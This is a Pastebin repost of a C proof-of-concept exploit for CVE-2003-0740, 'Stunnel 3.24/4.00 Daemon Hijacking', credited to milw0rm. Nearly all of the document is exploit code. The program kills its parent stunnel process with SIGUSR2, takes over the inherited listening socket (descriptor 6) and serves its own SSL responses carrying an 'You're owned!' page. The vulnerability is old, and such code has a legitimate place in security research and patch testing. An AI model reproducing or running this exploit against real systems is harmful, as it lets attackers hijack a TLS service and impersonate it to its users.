API tools faq
paste
FlyFar

Stunnel 3.24/4.00 - Daemon Hijacking - CVE-2003-0740

FlyFar
Mar 1st, 2024
97
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.34 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #define LISTEN_DESCRIPTOR 6
  2. #define CERTF "/opt/stunnel-sploit/foo-cert.pem"
  3. #define KEYF  "/opt/stunnel-sploit/foo-cert.pem"
  4.  
  5. static SSL_CTX    *ctx;
  6. static SSL        *ssl;
  7. static X509       *client_cert;
  8. static SSL_METHOD *meth;
  9.  
  10. static void server_loop(int descr);
  11. static void ssl_init(void);
  12.  
  13. int main(int argc, char *argv[])
  14. {
  15.     int pid = getppid();
  16.  
  17.     /* Need to fork so stunnel doesn't kill us */
  18.     if (fork() == 0) {
  19.         /* Become session leader */
  20.         setsid();
  21.  
  22.         /* Goodbye - thanks for the descriptor */
  23.         kill(pid, SIGUSR2);
  24.         close(0); close(1); close(2);
  25.         ssl_init();
  26.         server_loop(LISTEN_DESCRIPTOR);
  27.     }
  28.     return 0;
  29. }
  30.  
  31. static void server_loop(int descr)
  32. {
  33.     struct timeval   tv;
  34.     fd_set read_mask ;
  35.  
  36.     FD_SET(descr, &read_mask);
  37.     for (;;) {
  38.         struct sockaddr_in remote;
  39.         socklen_t len = sizeof(remote);
  40.         int fd;
  41.  
  42.         if (select(descr+1, &read_mask, NULL, NULL, 0 )
  43. == -1)
  44.             continue;
  45.         fd = accept(descr, &remote, &len);
  46.         if (fd >=0) {
  47.             char obuf[4096];
  48.  
  49.             if ((ssl = SSL_new (ctx)) != NULL) {
  50.                 SSL_set_fd (ssl, fd);
  51.                 SSL_set_accept_state(ssl);
  52.                 if ((SSL_accept (ssl)) == -1)
  53.                     exit(1);
  54.                 strcpy(obuf, "HTTP/1.0 200 OK\n");
  55.                 strcat(obuf, "Content-Length: 40\n");
  56.                 strcat(obuf, "Content-Type:
  57. text/html\n\n");
  58.                 strcat(obuf, "<html><body>You're
  59. owned!</body></html>");
  60.                 SSL_write (ssl, obuf, strlen(obuf));
  61.                 SSL_set_shutdown(ssl,
  62. SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
  63.                 SSL_free (ssl);
  64.                 ERR_remove_state(0);
  65.             }
  66.             close(fd);
  67.         }
  68.     }
  69.     SSL_CTX_free (ctx);  /* Never gets called */
  70. }
  71.  
  72. static void ssl_init(void)
  73. {
  74.     SSL_load_error_strings();
  75.     SSLeay_add_ssl_algorithms();
  76.     meth = SSLv23_server_method();
  77.     ctx = SSL_CTX_new (meth);
  78.     if (!ctx)
  79.         exit(1);
  80.     if (SSL_CTX_use_certificate_file(ctx, CERTF,
  81. SSL_FILETYPE_PEM) <= 0)
  82.         exit(1);
  83.     if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
  84. SSL_FILETYPE_PEM) <= 0)
  85.         exit(1);
  86.     if (!SSL_CTX_check_private_key(ctx))
  87.         exit(1);
  88. }
  89.  
  90.  
  91. // milw0rm.com [2003-09-05]
  92.            
Tags: Exploit CVE Vulnerability hijacking Stunnel Daemon Hijacking
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!